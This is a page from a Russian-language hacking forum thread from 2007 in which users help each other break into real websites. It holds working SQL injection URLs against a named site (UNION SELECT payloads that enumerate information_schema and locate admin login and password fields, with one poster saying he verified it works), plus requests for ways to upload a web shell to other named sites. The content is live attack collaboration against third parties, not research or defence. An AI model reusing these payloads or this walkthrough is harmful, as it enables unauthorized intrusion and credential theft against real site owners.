ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #191  
Старый 02.10.2007, 12:16
halkfild
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941

Репутация: 2277
По умолчанию

тут на ачате полно статей о скулях и о лоад_файл
http://forum.antichat.ru/thread19844.html
http://forum.antichat.ru/showthread.php?p=407222#post407222

еще тут
http://injection.rulezz.ru/

а вообще поиск)))
 

  #192  
Старый 02.10.2007, 16:38
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186

Репутация: 778
По умолчанию

Цитата:
Сообщение от phol1eadeux  
А что тут непонятного. Главное знать какой файл открывать. При фильтрации ковычек кодируешь строку
добавлю, кодировать можно тут -> _http://h4k.in/encoding/index.php вставляешь нужный текст, выбираешь способ кодирования, например, to SQL HEX()
 

  #193  
Старый 07.10.2007, 11:29
Sould_Shake
Новичок
Регистрация: 23.02.2007
Сообщений: 6
Провел на форуме:
45974

Репутация: 1
По умолчанию

Подскажите что делать дальше
_http://snowproject.ru/dj_details.php?did=-1+union+select+1,2,3,4,5,6,7/*

Читал мануалы, но немогу угадать название базы.
 

  #194  
Старый 07.10.2007, 11:55
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию

Вначале определяем версию.
http://snowproject.ru/dj_details.php?did=-1+union+select+1,2,3,version(),5,6,7/*
Ура 5 мускул!
Дальше проще....
http://snowproject.ru/dj_details.php?did=-1+union+select+1,2,3,table_name,5,6,7%20from%20inf ormation_schema.tables%20limit%200,1/*
limit 1,1 , limit 2,1 ... и т.д.
Исследуем структуру базы.... дальше по обстоятельствам.
 

  #195  
Старый 07.10.2007, 12:47
Sould_Shake
Новичок
Регистрация: 23.02.2007
Сообщений: 6
Провел на форуме:
45974

Репутация: 1
По умолчанию

Мэн поясни поподробней плиз, что теперь мне это даёт и как сформировать запрос на userass.
0 - CHARACTER_SETS
1 - COLLATIONS
3 - COLUMNS
4 - COLUMN_PRIVILEGES
5 - KEY_COLUMN_USAGE
6 - PROFILING
7 - ROUTINES
8 - SCHEMATA
9 - SCHEMA_PRIVILEGES
10 - STATISTICS
11 - TABLES
12 - TABLE_CONSTRAINTS
13 - TABLE_PRIVILEGES
14 - TRIGGERS
15 - USER_PRIVILEGES
16 - VIEWS
17 - banners
18 - contacts
19 - djs
20 - gen_sets
 

  #196  
Старый 07.10.2007, 13:12
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию

Все лежит в таблице gen_sets тама есть нужные тебе поля login и password
нужный тебе юзер в данном случае - root
пароль - найди сам , а то ведь так не интересно. И еще тебе нужно найти куда это подставить.
З.Ы. Я нашел и проверил. Работает.

З.З.Ы. И еще.... почитай мануалы внимательней, а то ты писал что читаешь....

Последний раз редактировалось Red_Red1; 07.10.2007 в 13:19..
 

  #197  
Старый 07.10.2007, 19:36
Sould_Shake
Новичок
Регистрация: 23.02.2007
Сообщений: 6
Провел на форуме:
45974

Репутация: 1
По умолчанию

То Red_Red1 - Респект, спасибо!
 

  #198  
Старый 09.10.2007, 22:28
bulbazaur
Участник форума
Регистрация: 10.09.2006
Сообщений: 160
Провел на форуме:
619440

Репутация: 96
Отправить сообщение для bulbazaur с помощью ICQ
По умолчанию

есть жоступ к админке, но могу только добавлять новости\статьи. при этом ничего не фильтруется. можно как-нибудь залить шелл?
 

  #199  
Старый 10.10.2007, 00:22
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Ну ты б поподробнее описал все: мож эта известная цмска, есть ли возможность заливать картинки или прекреплять файлы и т.д.
__________________
Карфаген должен быть разрушен...
 

  #200  
Старый 13.10.2007, 08:03
WebeX
Новичок
Регистрация: 31.03.2007
Сообщений: 22
Провел на форуме:
85992

Репутация: -1
По умолчанию

http://www.0629.com.ua/view_news.php?id_news=
Прописываю: http://www.0629.com.ua/view_news.php?id_news=http://mail.ru
Пишет: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '://mail.ru' at line 1

Можно ли как нибудь загрузить шелл?
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ